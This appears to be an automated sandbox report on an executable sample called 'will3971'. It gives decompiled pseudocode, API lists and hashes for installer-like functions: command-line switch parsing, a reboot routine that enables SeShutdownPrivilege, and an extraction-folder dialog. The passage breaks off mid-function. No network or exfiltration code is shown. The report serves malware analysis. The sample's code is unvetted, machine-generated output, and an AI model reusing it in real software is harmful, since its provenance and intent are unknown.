Opcode ID: b01857c819270aabea0868528c2c476537f28fa1d667773a5840fa20060bf563
Instruction ID: 9424f48f921df637a4200b24c78d29a732a8cd45ec77868a6272d94745cd606c
Opcode Fuzzy Hash: b01857c819270aabea0868528c2c476537f28fa1d667773a5840fa20060bf563
Instruction Fuzzy Hash: FDB0123100010CB78F001B42FC0CC553F1DD6C02B07000020F50C410218F339811C585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002F5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E002F5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x2f8004; // 0x404cc811
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E002F6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E002F6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x2f8004; // 0x404cc811
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E002F597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E002F44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x2f9124 = E002F6285();
									_t75 = 0;
								}
								return E002F6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E002F44B9(0, 0x521, 0x2f1140, 0, 0x40, 0);
												_t85 =  *0x2f8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E002F667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E002F667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E002F5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E002F1680(0x2f8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E002F667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E002F667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x2f8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E002F5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x2f8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x2f8a3a;
																}
																E002F1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E002F658A(_t218, 0x104, 0x2f1140);
																if(E002F31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x2f8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x2f8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x2f8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x2f8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x2f8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x2f9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x2f9a2c =  *0x2f9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x2f8d48 =  *0x2f8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x2f9a2c =  *0x2f9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x2f9a2c =  *0x2f9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x2f8d48 =  *0x2f8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x2f9a2c =  *0x2f9a2c | 0x00000004;
																										L70:
																										 *0x2f8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x2f9a2c = 3;
																	 *0x2f8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x2f8a2c != 0 &&  *0x2f8b3e == 0) {
						if(GetModuleFileNameA( *0x2f9a3c, 0x2f8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E002F66C8(0x2f8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x002f5c9e
0x002f5ca9
0x002f5cb0
0x002f5cb3
0x002f5cb6
0x002f5cb7
0x002f5cb8
0x002f5cbd
0x002f6204
0x002f5ccb
0x00000000
0x002f5ccb
0x002f5cd3
0x002f5cd7
0x002f5cf4
0x00000000
0x002f5cf4
0x002f5cf8
0x002f5d00
0x00000000
0x002f5d06
0x002f5d06
0x002f5d0e
0x002f5d10
0x002f5d12
0x002f5d14
0x002f5d15
0x002f5d17
0x002f5d49
0x00000000
0x00000000
0x00000000
0x00000000
0x002f5d19
0x002f5d19
0x002f5d1d
0x00000000
0x002f5d3f
0x002f5d3f
0x002f5d4b
0x002f5d4b
0x002f5d4f
0x002f5d8d
0x00000000
0x002f5d93
0x002f5d93
0x002f5d9a
0x002f5d9d
0x002f5d9e
0x00000000
0x002f5d9e
0x002f5d51
0x002f5d5b
0x002f5d72
0x002f60fb
0x002f60fb
0x002f6207
0x002f620a
0x002f620b
0x002f620e
0x002f6217
0x002f5d78
0x002f5d78
0x002f5d80
0x002f5d83
0x002f5d84
0x00000000
0x002f5d84
0x002f5d5d
0x002f5d5f
0x002f5d62
0x002f5d68
0x002f5d64
0x002f5d64
0x002f5d64
0x00000000
0x002f5d62
0x002f5d5b
0x002f5d4f
0x002f5d1d
0x00000000
0x002f5d9f
0x002f5d9f
0x002f5da5
0x002f5dab
0x002f5dba
0x002f6218
0x002f621d
0x002f6220
0x002f6221
0x002f6229
0x002f6230
0x002f6247
0x002f626a
0x002f6272
0x002f6249
0x002f6255
0x002f625f
0x002f6264
0x002f6264
0x002f6284
0x002f5dc0
0x002f5dc0
0x002f5dca
0x002f5e22
0x00000000
0x00000000
0x00000000
0x00000000
0x002f5dcc
0x002f5dce
0x002f5e24
0x002f5e24
0x002f5e2c
0x002f5e47
0x002f5e4a
0x002f61d2
0x002f61e2
0x002f61e7
0x002f61ee
0x002f61f1
0x002f61f1
0x002f61f8
0x002f61f8
0x002f5e50
0x002f5e53
0x002f6109
0x002f611f
0x00000000
0x002f6125
0x002f6137
0x002f613a
0x002f613c
0x002f613e
0x002f613e
0x002f6141
0x002f6141
0x002f6143
0x002f6144
0x002f614a
0x00000000
0x002f6150
0x002f6152
0x002f615c
0x002f6170
0x002f6172
0x002f617c
0x002f6190
0x002f6190
0x002f6196
0x002f61a5
0x00000000
0x002f61ab
0x002f61b9
0x002f61c6
0x002f61c6
0x002f617e
0x002f6180
0x002f618a
0x00000000
0x00000000
0x00000000
0x00000000
0x002f618a
0x002f615e
0x002f6160
0x002f616a
0x00000000
0x00000000
0x00000000
0x00000000
0x002f616a
0x002f615c
0x002f614a
0x002f610b
0x002f610e
0x002f610e
0x00000000
0x002f5e59
0x002f5e59
0x002f5e5c
0x002f604f
0x002f6056
0x00000000
0x002f605c
0x002f606e
0x002f6071
0x002f6073
0x002f6075
0x002f6075
0x002f6078
0x002f6078
0x002f607a
0x002f607b
0x002f6081
0x00000000
0x002f6087
0x002f6087
0x002f608d
0x002f609c
0x00000000
0x002f60a2
0x002f60aa
0x002f60b2
0x002f60b7
0x002f60bd
0x002f60bf
0x002f60bf
0x002f60d6
0x002f60e0
0x002f60e7
0x002f60f5
0x00000000
0x00000000
0x00000000
0x00000000
0x002f60f5
0x002f609c
0x002f6081
0x002f5e62
0x002f5e62
0x002f5e65
0x002f5fd3
0x002f5fe9
0x00000000
0x002f5fef
0x002f5fef
0x002f5ff7
0x002f5ffd
0x002f6003
0x002f6006
0x002f6011
0x002f6014
0x002f603d
0x002f6016
0x002f6018
0x002f6019
0x002f601b
0x002f6033
0x002f601d
0x002f6020
0x002f6029
0x002f6022
0x002f6022
0x002f6022
0x002f6020
0x002f601b
0x002f6042
0x002f6044
0x002f6046
0x002f604a
0x002f5ff7
0x002f5fd5
0x002f5fd8
0x002f5fd8
0x00000000
0x002f5e6b
0x002f5e6b
0x002f5e6e
0x002f5f8b
0x002f5f99
0x00000000
0x002f5f9f
0x002f5fa7
0x002f5faf
0x00000000
0x002f5fb1
0x002f5fb3
0x00000000
0x002f5fb5
0x002f5fb7
0x00000000
0x002f5fb9
0x00000000
0x002f5fb9
0x002f5fb7
0x002f5fb3
0x002f5faf
0x002f5f8d
0x002f5f8d
0x002f5f8d
0x002f5f8f
0x002f5fc1
0x002f5fc1
0x002f5fc1
0x00000000
0x002f5e74
0x002f5e74
0x002f5e77
0x002f5ea0
0x002f5ebd
0x002f5f79
0x00000000
0x002f5f7f
0x002f5ec3
0x002f5ec3
0x002f5ecc
0x002f5ed4
0x002f5ed6
0x002f5edc
0x002f5edf
0x002f5eea
0x002f5eed
0x002f5f3f
0x002f5f40
0x00000000
0x002f5eef
0x002f5eef
0x002f5ef2
0x002f5f34
0x002f5ef4
0x002f5ef4
0x002f5ef7
0x002f5f2b
0x00000000
0x002f5ef9
0x002f5ef9
0x002f5efc
0x002f5f22
0x00000000
0x002f5efe
0x002f5eff
0x002f5f02
0x002f5f16
0x002f5f04
0x002f5f07
0x002f5f0d
0x002f5f46
0x002f5f46
0x002f5f09
0x002f5f09
0x002f5f09
0x002f5f07
0x002f5f02
0x002f5efc
0x002f5ef7
0x002f5ef2
0x002f5f4c
0x002f5f4e
0x002f5f50
0x002f5f54
0x002f5ed4
0x002f5ea2
0x002f5ea4
0x002f5eaf
0x002f5eaf
0x00000000
0x002f5e79
0x002f5e7d
0x00000000
0x002f5e83
0x002f5e83
0x002f5e83
0x002f5e85
0x002f5e85
0x002f5e8e
0x00000000
0x002f5e94
0x00000000
0x002f5e94
0x002f5e8e
0x002f5e7d
0x002f5e77
0x002f5e6e
0x002f5e65
0x002f5e5c
0x00000000
0x00000000
0x00000000
0x002f5dd0
0x002f5dd0
0x002f5dd0
0x00000000
0x002f5dd0
0x002f5dce
0x002f5dca
0x002f5dba
0x00000000
0x002f5d00
0x002f5dd9
0x002f5e04
0x002f61fe
0x002f5e0a
0x002f5e0c
0x002f5e17
0x002f5e17
0x002f5e04
0x002f6200
0x002f6200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 002F5CEE
GetModuleFileNameA.KERNEL32(002F8B3E,00000104,00000000,?,?), ref: 002F5DFC
CharUpperA.USER32(?), ref: 002F5E3E
CharUpperA.USER32(-00000052), ref: 002F5EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 002F5F6F
CharUpperA.USER32(?), ref: 002F5FA7
CharUpperA.USER32(-0000004E), ref: 002F6008
CharUpperA.USER32(?), ref: 002F60AA
CloseHandle.KERNEL32(00000000,002F1140,00000000,00000040,00000000), ref: 002F61F1
ExitProcess.KERNEL32 ref: 002F61F8

Strings

:, xrefs: 002F6118
", xrefs: 002F612D
RegServer, xrefs: 002F5F66
", xrefs: 002F5D78

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 32ccd7e39887cee61c4459e38893c2b7d3224015281c9a3d5b698d8102fd82ab
Instruction ID: 523b1fd832ab21dfaed54b3768714c16deb7b14b4d2c622ced77b6f9b5afe082
Opcode Fuzzy Hash: 32ccd7e39887cee61c4459e38893c2b7d3224015281c9a3d5b698d8102fd82ab
Instruction Fuzzy Hash: B6D14C71A34A6E5ADB358F389C4C7B6F761E7163D0F1401BAC78AC6591DAB44EA2CF00

Uniqueness

Uniqueness Score: -1.00%

Function 002F1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E002F1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x2f9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x2f8004; // 0x404cc811
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E002F44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E002F6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E002F44B9(0, 0x522, 0x2f1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E002F1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x002f1f90
0x002f1f90
0x002f1f93
0x002f1f98
0x002f1fa4
0x002f1fa7
0x002f1fc5
0x002f1fcd
0x002f1fdb
0x002f1ee5
0x002f1eea
0x002f1ef1
0x002f1ef4
0x002f1f0c
0x002f1f2e
0x002f1f3a
0x002f1f46
0x002f1f4d
0x002f1f58
0x002f1f60
0x002f1f61
0x002f1f62
0x002f1f75
0x002f1f80
0x002f1f77
0x002f1f77
0x00000000
0x002f1f77
0x002f1f64
0x002f1f64
0x00000000
0x002f1f64
0x002f1f0e
0x002f1f0e
0x002f1f13
0x002f1f13
0x002f1f14
0x002f1f14
0x002f1f16
0x002f1f17
0x002f1f1a
0x002f1f1f
0x002f1f1f
0x002f1f86
0x002f1f8f
0x002f1fcf
0x002f1fd3
0x00000000
0x002f1fd3
0x002f1fa9
0x002f1fb4
0x002f1fbb
0x002f1fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x002f1fc3
0x002f1f9a
0x002f1f9a
0x002f1fa2
0x002f1fd9
0x002f1fda
0x00000000
0x00000000
0x00000000
0x002f1fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 002F1EFB
OpenProcessToken.ADVAPI32(00000000), ref: 002F1F02
ExitWindowsEx.USER32(00000002,00000000), ref: 002F1FD3

Strings

SeShutdownPrivilege, xrefs: 002F1F28

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: 6ec83061eb9c8c6907e3d787b1117b7c3555d023d36510fefe1b41ae99f7206d
Instruction ID: 9d403a263d8f5ce725fd569756d6cd1f4dbb5a7323be94c2ae5f72c2b0ed1a39
Opcode Fuzzy Hash: 6ec83061eb9c8c6907e3d787b1117b7c3555d023d36510fefe1b41ae99f7206d
Instruction Fuzzy Hash: 1921DBB1A50309E7DB205BA1AC4EF7BB6B8DB857E0F50013DFB06E6580D7748831D661

Uniqueness

Uniqueness Score: -1.00%

Function 002F6CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F6CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x2f6e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x002f6cf7
0x002f6cfd
0x002f6d00
0x002f6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,002F6E26,002F1000), ref: 002F6CF7
UnhandledExceptionFilter.KERNEL32(&n/,?,002F6E26,002F1000), ref: 002F6D00
GetCurrentProcess.KERNEL32(C0000409,?,002F6E26,002F1000), ref: 002F6D0B
TerminateProcess.KERNEL32(00000000,?,002F6E26,002F1000), ref: 002F6D12

Strings

&n/, xrefs: 002F6CFD

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n/
API String ID: 3231755760-2469304368
Opcode ID: 74ed8c9927d443847329db85b2d2ef2607e0c54fc3af751d4333ffcec5071cb5
Instruction ID: 9ae43307f19514fb3c0437802aafaa67cb346acd5b46e42f39ac57d050816f0e
Opcode Fuzzy Hash: 74ed8c9927d443847329db85b2d2ef2607e0c54fc3af751d4333ffcec5071cb5
Instruction Fuzzy Hash: 2BD0C9B2000108BBDB002BE1FC0CA6A3F28FB482B2F464020F31D82060CA329451CB52

Uniqueness

Uniqueness Score: -1.00%

Function 002F3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E002F3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E002F43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lega");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x2f9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x2f91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E002F44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x2f91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x2f91e5 - 3;
						if(_t49 - 0x2f91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x2f91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x2f91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E002F658A(0x2f91e4, 0x104, 0x2f1140);
								_t27 = E002F58C8(0x2f91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x2f91e4 - 0x5c;
									if( *0x2f91e4 != 0x5c) {
										L30:
										_t30 = E002F597D(0x2f91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x2f91e5 - 0x5c;
									if( *0x2f91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E002F44B9(_t64, 0x54a, 0x2f91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x2f91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x2f91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x2f91e4 - 0x5c;
						if( *0x2f91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x2f9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x2f9a3c, 0x3e8, 0x2f8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E002F4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x2f87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E002F44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
